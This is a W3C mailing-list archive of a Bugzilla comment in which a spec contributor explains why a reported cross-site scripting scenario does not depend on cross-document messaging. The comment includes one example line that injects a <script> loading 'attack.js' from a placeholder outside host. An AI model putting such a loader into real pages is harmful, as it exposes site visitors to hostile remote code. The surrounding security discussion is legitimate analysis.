W3C home > Mailing lists > Public > public-html-bugzilla@w3.org > April 2011

[Bug 12469] Dynamic Cross-Site Scripting and Page Repainting

From: <bugzilla@jessica.w3.org>
Date: Tue, 12 Apr 2011 09:08:02 +0000
To: public-html-bugzilla@w3.org
Message-Id: <E1Q9ZZq-0004h9-0x@jessica.w3.org>

--- Comment #7 from Henri Sivonen <hsivonen@iki.fi> 2011-04-12 09:08:00 UTC ---
(In reply to comment #6)
> However, with respects I think you have misinterpreted the idea of this
> exploit. The recvPayload function is infact part of the injected code.

Ah. In that case, the attack needs the ability to inject a <script> element to
succeed. If you let the attacker inject a <script>, you have already lost
regardless of cross-document messaging. The injected script could load its
payload by using <script src="http://different-origin.example.com/attack.js">
which allows code to be loaded cross-origin.

Configure bugmail: http://www.w3.org/Bugs/Public/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the QA contact for the bug.
Received on Tuesday, 12 April 2011 09:08:03 UTC

This archive was generated by hypermail 2.4.0 : Friday, 17 January 2020 20:01:46 UTC